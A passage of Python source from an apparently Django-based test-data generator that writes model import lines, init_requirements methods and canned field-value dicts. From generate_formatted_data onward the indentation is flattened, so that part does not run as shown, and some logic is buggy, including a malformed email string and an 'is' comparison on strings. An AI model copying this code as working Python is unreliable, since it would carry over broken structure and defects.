        # Create a dictionary that contains all files that need to be imported.
        requirements_dict = dict()
        # Iterate over the models in the current app and add them.
        requirements_dict[app_name] = list()
        for model, model_data in app_data.items():
            # Check if current model isn't in the ignored list and currently in dictionary.
            # True - add to dictionary for current model.
            if model not in settings.TEST_BUILDER_IGNORED_MODELS and model not in requirements_dict[app_name]:
                requirements_dict[app_name].append(model)
        # Iterate over the app, model pairs in required imports.
        # (Only the current app is present, but the loop keeps the structure
        # ready for multi-app requirements.)
        for app, models in requirements_dict.items():
            # Format the start of the import lines.
            required_models = 'from {}.{}.models import' \
                .format(settings.TEST_BUILDER_INPUT_APP_PREFIX, app.split('.', 1)[1])
            # Iterate over models using enumerate to keep a number.
            for count, model in enumerate(models):
                # Add formatted model to each string.
                # Use count to determine if space or comma used.
                required_models += (' ' if count == 0 else ', ') + model
            # Add required models to the output string.
            out_string += required_models + '\n'
        return out_string
    def generate_model_data(self, model_name, model_data):
        """
        Render the complete ``<Model>TestData`` class source for one model.

        Builds the class header, an ``init_requirements`` static method that
        creates two instances of every related model this model depends on,
        the ``model``/``url`` attributes, and the canned test-data dicts.

        :param model_name: Bumpy-case model name.
        :param model_data: Dict with at least 'fields' and 'url'; field entries
            may carry a dotted 'related_model' path.
        :return: Tab-indented class source text.
        """
        out_string = str()
        out_string += 'class {}TestData({}TestData):\n' \
            .format(model_name, snake_to_bumpy(settings.TEST_BUILDER_OUTPUT_APP_PREFIX))
        out_string += '\t\"\"\"\n'
        out_string += '\tTest data for {}\n'.format(model_name)
        out_string += '\t\"\"\"\n'
        out_string += '\n'
        # Create init requirements function
        related_string = str()
        related_string += "\t@staticmethod\n"
        related_string += "\tdef init_requirements():\n"
        had_requirement = False
        # Iterate over the fields of the models.
        for field, field_data in model_data['fields'].items():
            # Check if the field has a related_model attribute.
            # True - Create model for data.
            if 'related_model' in field_data:
                # Get the related models name and splitting at '.' from the reverse.
                # NOTE: The string is split two from reverse to separate the string into
                # app name, "model", model name. The word model is discarded, hence the use of 0 and 2 indexes.
                related_model = field_data['related_model'].rsplit('.', 2)
                # Check that the model starts with the prefix.
                # True - Create model for data.
                if related_model[0].startswith(settings.TEST_BUILDER_INPUT_APP_PREFIX):
                    had_requirement = True
                    required_name = related_model[2]
                    split_name = related_model[0].split('.', 1)[1]
                    # Only emit imports/creation for models outside the current
                    # app.  NOTE(review): had_requirement is set True even when
                    # this branch is skipped, so no 'pass' is emitted then —
                    # confirm that an empty init_requirements body cannot result.
                    if split_name not in self.current_app_name:
                        related_string += '\t\t# Import the required model and data\n'
                        related_string += '\t\tfrom {}.models import {}\n'\
                            .format(related_model[0], required_name)
                        related_string += '\t\tfrom {}.{}.test_data import {}TestData\n'\
                            .format(settings.TEST_BUILDER_OUTPUT_APP_PREFIX,
                                    split_name,
                                    required_name)
                        related_string += '\t\t# Check that requirements haven\'t already been created.\n'
                        related_string += '\t\t# True - Create necessary requirements.\n'
                        related_string += '\t\tif {}.objects.count() == 0:\n'.format(required_name)
                        related_string += '\t\t\t{}TestData.init_requirements()\n'.format(required_name)
                        related_string += '\t\t\tmodel = {0}.objects.create(**{0}TestData.get_data(\'standard\'))\n'.format(
                            required_name)
                        related_string += '\t\t\tmodel.save()\n'
                        related_string += '\t\t\tmodel = {0}.objects.create(**{0}TestData.get_data(\'unique\'))\n'.format(
                            required_name)
                        related_string += '\t\t\tmodel.save()\n'
                        related_string += '\n'
        # Check that the model hasn't had any requirements.
        # True - Add pass to the function body for init_requirements.
        if not had_requirement:
            related_string += '\t\tpass\n\n'
        out_string += '{}'.format(related_string)
        # Create required info
        out_string += '\t# Store self information\n'
        out_string += '\tmodel = {}\n'.format(plain_to_bumpy(model_name))
        out_string += '\turl = \'{}\'\n'.format(model_data['url'])
        out_string += '\n'
        # Create the test data and add to out string.
        out_string += self.generate_test_data(model_data=model_data)
        return out_string
    def generate_test_data(self, model_data):
        """
        Render all canned data dicts for a model: 'standard', 'unique', and a
        missing_/modified_ variant pair per field.

        :param model_data: Model description dict holding 'fields'.
        :return: Source text of every data-dict assignment.
        """
        out_string = str()
        # Take reference to models field data.
        fields = model_data['fields']
        # Create standard formatted data and add to out string.
        out_string += self.generate_formatted_data(field_data=fields)
        out_string += '\n'
        # Create unique formatted data and add to out string.
        # (Built inline rather than via generate_formatted_data so the
        # 'unique' prefix can be passed to generate_data.)
        out_string += '\tunique = {\n'
        # Iterate over fields creating the appropriate data for each.
        for field, field_data in fields.items():
            out_string += '\t\t\'{}\': {},\n' \
                .format(field, self.generate_data(field_name=field, field_data=field_data, prefix='unique'))
        out_string += '\t}\n\n'
        # Iterate over fields for model creating the required variant pairs for each, outputting formatted data.
        for field, field_data in fields.items():
            variant_dict = self.generate_variant_data(field_name=field,
                                                      field_data=field_data)
            # Iterate over variant dictionary creating the appropriately formatted data for out string.
            for variant, variant_data in variant_dict.items():
                out_string += self.generate_formatted_data(field_data=fields,
                                                           name=variant,
                                                           modified_field=variant_data)
                out_string += '\n'
        return out_string
def generate_formatted_data(self, field_data, name='standard', modified_field=None):
out_string = str()
# Create data header
out_string += '\t{} = {{\n'.format(name)
# Iterate over fields, creating appropriate data given passed parameters.
for field, attributes in field_data.items():
# Check that the current field is the desired modified field.
# True - Add variant line to out string.
# False - Add standard formatted line to outstring.
if modified_field is not None and field is modified_field['field']:
# Check that line isn't blank.
# True - Add line to out string.
if modified_field['line'] is not None:
out_string += modified_field['line']
else:
out_string += '\t\t\'{}\': {},\n' \
.format(field, self.generate_data(field_name=field, field_data=attributes))
out_string += '\t}\n'
return out_string
def generate_data(self, field_name, field_data, prefix='standard'):
out_string = str()
# This is a mess of code that needs to be refactored at sometime in the hopefully near future TODO:
if 'default' in field_data:
out_string += field_data['default']
elif 'choices' in field_data:
choice = field_data['choices'][0 if prefix == 'standard' else -1]
out_string += ('{}' if type(choice) == int else '\'{}\'').format(choice)
else:
field_type = field_data['type']
if field_type == 'BooleanField':
out_string += 'True' if prefix == 'standard' else 'False'
elif field_type == 'CharField':
char = '{}_char'.format(prefix)
out_string = '\'{}\''.format(char[:field_data['max_length']])
elif field_type == 'DateField':
out_string = '\'{}\''.format(
'2015-01-20' if prefix == 'standard' else '2015-02-20') # TODO: Figure out if this needs anything more complex
elif field_type == 'EmailField':
email = '{}_email'.format(prefix)
out_string = '\'{}\'@d.io'.format(
email[:-field_data['max_length']]) # TODO: Check that this is how this field actually works
elif field_type == 'IntegerField':
integer = '12345' if prefix == 'standard' else '54321'
if 'max_length' in field_data:
integer = integer[:field_data['max_length']]
out_string = '{}'.format(integer)
elif field_type == 'SlugField':
slug = '{}_slug'.format(prefix)
out_string = '\'{}\''.format(slug[:field_data['max_length']])
elif field_type == 'TextField':
text = '{}_text'.format(prefix)
out_string = '\'{}\''.format(text[:field_data['max_length']])
elif field_type == 'ForeignKey':
model_data = self.get_model_data_from_name(field_data['related_model'])
if model_data is not None:
out_string += '\'{}/{}/\''.format(model_data['url'], '1' if prefix == 'standard' else '2')
else: # TODO: This will occur when user is the related field
out_string += '\'\''
elif field_type == 'OneToOne':
model_data = self.get_model_data_from_name(field_data['related_model'])
if model_data is not None:
out_string += '\'{}/{}/\''.format(model_data['url'], '1' if prefix == 'standard' else '2')
else: # TODO: This will occur when user is the related field
out_string += '\'\''
elif field_type == 'ManyToMany':
model_data = self.get_model_data_from_name(field_data['related_model'])
if model_data is not None:
out_string += '\'{}/{}/\''.format(model_data['url'], '1' if prefix == 'standard' else '2')
else: # TODO: This will occur when user is the related field
out_string += '\'\''
else:
out_string = '\'default\''
return out_string
def generate_variant_data(self, field_name, field_data):
out_dict = dict()
out_dict.update({
'missing_{}'.format(field_name): {
'field': field_name,
'line': None
},
'modified_{}'.format(field_name): {
'field': field_name,
'line': '\t\t\'{}\': {},\n'.format(field_name, self.generate_data(field_name=field_name,
field_data=field_data,
prefix='modified'))
}
})
# TODO: Get individual model variants
return out_dict
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.